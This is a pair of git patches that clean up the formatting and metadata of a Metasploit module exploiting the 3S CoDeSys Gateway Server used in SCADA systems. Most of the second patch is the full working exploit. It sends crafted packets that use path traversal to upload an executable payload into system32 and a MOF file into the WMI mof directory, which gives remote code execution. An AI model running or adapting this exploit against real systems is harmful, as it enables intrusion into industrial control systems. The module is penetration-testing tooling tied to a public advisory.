From 437d6d6ba6e191a2db82e22b6f6c5363a7f82a34 Mon Sep 17 00:00:00 2001
From: "Enrique A. Sanchez Montellano" <enrique.sanchez@security-dojo.com>
Date: Wed, 6 Mar 2013 10:44:29 -0800
Subject: [PATCH 1/2] Fixed EOL, bad indent, added header, removed
 #!/usr/env/ruby

---
 .../codesys_gateway_server_remote_execution.rb      | 13 +++----------
 1 file changed, 3 insertions(+), 10 deletions(-)

diff --git a/modules/exploits/windows/scada/codesys_gateway_server_remote_execution.rb b/modules/exploits/windows/scada/codesys_gateway_server_remote_execution.rb
index 05c318e378..f849684d04 100644
--- a/modules/exploits/windows/scada/codesys_gateway_server_remote_execution.rb
+++ b/modules/exploits/windows/scada/codesys_gateway_server_remote_execution.rb
@@ -18,18 +18,17 @@ class Metasploit3 < Msf::Exploit::Remote
                             },
                           'Author' =>
                                 [
-                                    'Aaron Portnoy <aaron@exodusintel.com>',
                                     'Enrique Sanchez <esanchez@accuvant.com>'
-                                   ],
+                                ],
                           'License' => 'MSF_LICENSE',
                           'References' =>
                                 [
-                                    ['Exodus Intel Training', '02-2013']
+                                    ['ICSA-13-050-01', '02-19-2013']
                                 ],
                           'Platform' => 'win',
                           'Targets' =>
                             [
-                                ['Windows Universal', { }]
+                                ['Windows Universal S3 CoDeSyS < 2.3.9.27', { }]
                             ],
                           'DefaultTarget' => 0
                           ))
@@ -77,12 +76,6 @@ class Metasploit3 < Msf::Exploit::Remote
         print_status("File uploaded")
     end
         
-    def remove_file
-    end
-        
-    def read_file
-    end
-        
     def exploit
         print_status("- Attempting to communicate with SCADA system #{rhost} on port #{rport}")
         

From aa5c9461aef6e667467af69f82e5ffbef3eb5fb9 Mon Sep 17 00:00:00 2001
From: "Enrique A. Sanchez Montellano" <enrique.sanchez@security-dojo.com>
Date: Wed, 6 Mar 2013 10:50:31 -0800
Subject: [PATCH 2/2] Fixed more styling issues, EOL, tabs and headers

---
 ...codesys_gateway_server_remote_execution.rb | 199 +++++++++---------
 1 file changed, 101 insertions(+), 98 deletions(-)

diff --git a/modules/exploits/windows/scada/codesys_gateway_server_remote_execution.rb b/modules/exploits/windows/scada/codesys_gateway_server_remote_execution.rb
index f849684d04..d728af5ba3 100644
--- a/modules/exploits/windows/scada/codesys_gateway_server_remote_execution.rb
+++ b/modules/exploits/windows/scada/codesys_gateway_server_remote_execution.rb
@@ -1,102 +1,105 @@
-#!/usr/bin/env ruby
-
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com
+##
 require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
-    
-    Rank = ExcellentRanking
-    include Msf::Exploit::EXE
-    include Msf::Exploit::FileDropper
-    include Msf::Exploit::Remote::Tcp
-    include Msf::Exploit::WbemExec
-    
-    def initialize(info = {})
-        super(update_info(info,
-                          'Name' => 'SCADA 3S CoDeSys Gateway Server Remote Execution',
-                          'Description' => %q{
-                            This module exploits arbitrary file creation to execute a mof file
-                            gaining remote execution within the SCADA system
-                            },
-                          'Author' =>
-                                [
-                                    'Enrique Sanchez <esanchez@accuvant.com>'
-                                ],
-                          'License' => 'MSF_LICENSE',
-                          'References' =>
-                                [
-                                    ['ICSA-13-050-01', '02-19-2013']
-                                ],
-                          'Platform' => 'win',
-                          'Targets' =>
-                            [
-                                ['Windows Universal S3 CoDeSyS < 2.3.9.27', { }]
-                            ],
-                          'DefaultTarget' => 0
-                          ))
-        
-        register_options(
-            [
-                Opt::RPORT(1211),
-            ], self.class
-        )
-    end
-        
-    def check
-        return Exploit::CheckCode::Vulnerable
-    end
 
-    ##
-    # upload_file(remote_filepath, remote_filename, local_filedata)
-    #
-    # remote_filepath: Remote filepath where the file will be uploaded
-    # remote_filename: Remote name of the file to be executed ie. boot.ini
-    # local_file: File containing the read data for the local file to be uploaded, actual open/read/close done in exploit()
-        
-    def upload_file(remote_filepath, remote_filename, local_filedata = null)
-        magic_code = "\xdd\xdd"
-        opcode = [6].pack('L')
-            
-        # We create the filepath for the upload, for execution it should be \windows\system32\wbem\mof\<file with extension mof!
-        file = "..\\..\\" << remote_filepath << remote_filename << "\x00"
-        print_debug("File to upload: #{file}")    
-        pkt_size = local_filedata.size() + file.size() + (0x108 - file.size()) + 4
-        print_debug(pkt_size)
-        
-         # Magic_code  + packing + size
-        pkt = magic_code << "AAAAAAAAAAAA" << [pkt_size].pack('L')
-        
-        tmp_pkt = opcode << file
-        tmp_pkt += "\x00"*(0x108 - tmp_pkt.size) << [local_filedata.size].pack('L') << local_filedata
-        pkt << tmp_pkt
-        
-        print_status("Starting upload of file #{remote_filename}")
-        connect
-        sock.put(pkt)
-        disconnect
-        
-        print_status("File uploaded")
-    end
-        
-    def exploit
-        print_status("- Attempting to communicate with SCADA system #{rhost} on port #{rport}")
-        
-        # We create an exe payload, we have to get remote execution in 2 steps
-        exe = generate_payload_exe
-        exe_name = Rex::Text::rand_text_alpha(8) + ".exe"
-        upload_file("windows\\system32\\", exe_name, exe)
-        
-        # We create the mof file and upload (second step)
-        mof_name = Rex::Text::rand_text_alpha(8) + ".mof"
-        mof = generate_mof(mof_name, exe_name)
-        upload_file("WINDOWS\\system32\\wbem\\mof\\", mof_name, mof)
-        
-        print_status("Everything is ready, waiting for a session ... ")
-        handler
-        
-        #Taken from the spooler exploit writen byt jduck and HDMoore
-        cnt = 1
-        while session_created? == false and cnt < 25
-            ::IO.select(nil, nil, nil, 0.25)
-            cnt += 1
-        end
-    end
+	Rank = ExcellentRanking
+	include Msf::Exploit::EXE
+	include Msf::Exploit::FileDropper
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::WbemExec
+
+	def initialize(info = {})
+		super(update_info(info,
+						'Name' => 'SCADA 3S CoDeSys Gateway Server Remote Execution',
+						'Description' => %q{
+						This module exploits arbitrary file creation to execute a mof file
+						gaining remote execution within the SCADA system
+						},
+						'Author' =>
+							[
+								'Enrique Sanchez <esanchez@accuvant.com>'
+							],
+						'License' => 'MSF_LICENSE',
+						'References' =>
+							[
+								['ICSA-13-050-01', '02-19-2013']
+							],
+						'DisclosureDate' => 'Feb 02 2013',
+						'Platform' => 'win',
+						'Targets' =>
+							[
+								['Windows Universal S3 CoDeSyS < 2.3.9.27', { }]
+							],
+						'DefaultTarget' => 0))
+
+		register_options(
+			[
+				Opt::RPORT(1211),
+			], self.class)
+	end
+
+	def check
+		return Exploit::CheckCode::Vulnerable
+	end
+
+	##
+	# upload_file(remote_filepath, remote_filename, local_filedata)
+	#
+	# remote_filepath: Remote filepath where the file will be uploaded
+	# remote_filename: Remote name of the file to be executed ie. boot.ini
+	# local_file: File containing the read data for the local file to be uploaded, actual open/read/close done in exploit()
+
+	def upload_file(remote_filepath, remote_filename, local_filedata = null)
+		magic_code = "\xdd\xdd"
+		opcode = [6].pack('L')
+
+		# We create the filepath for the upload, for execution it should be \windows\system32\wbem\mof\<file with extension mof!
+		file = "..\\..\\" << remote_filepath << remote_filename << "\x00"
+		print_debug("File to upload: #{file}")
+		pkt_size = local_filedata.size() + file.size() + (0x108 - file.size()) + 4
+		print_debug(pkt_size)
+
+		# Magic_code  + packing + size
+		pkt = magic_code << "AAAAAAAAAAAA" << [pkt_size].pack('L')
+
+		tmp_pkt = opcode << file
+		tmp_pkt += "\x00"*(0x108 - tmp_pkt.size) << [local_filedata.size].pack('L') << local_filedata
+		pkt << tmp_pkt
+
+		print_status("Starting upload of file #{remote_filename}")
+		connect
+		sock.put(pkt)
+		disconnect
+
+		print_status("File uploaded")
+	end
+
+	def exploit
+		print_status("Attempting to communicate with SCADA system #{rhost} on port #{rport}")
+
+		# We create an exe payload, we have to get remote execution in 2 steps
+		exe = generate_payload_exe
+		exe_name = Rex::Text::rand_text_alpha(8) + ".exe"
+		upload_file("windows\\system32\\", exe_name, exe)
+
+		# We create the mof file and upload (second step)
+		mof_name = Rex::Text::rand_text_alpha(8) + ".mof"
+		mof = generate_mof(mof_name, exe_name)
+		upload_file("WINDOWS\\system32\\wbem\\mof\\", mof_name, mof)
+
+		print_status("Everything is ready, waiting for a session ... ")
+		handler
+
+		#Taken from the spooler exploit writen byt jduck and HDMoore
+		cnt = 1
+		while session_created? == false and cnt < 25
+			::IO.select(nil, nil, nil, 0.25)
+			cnt += 1
+		end
+	end
 end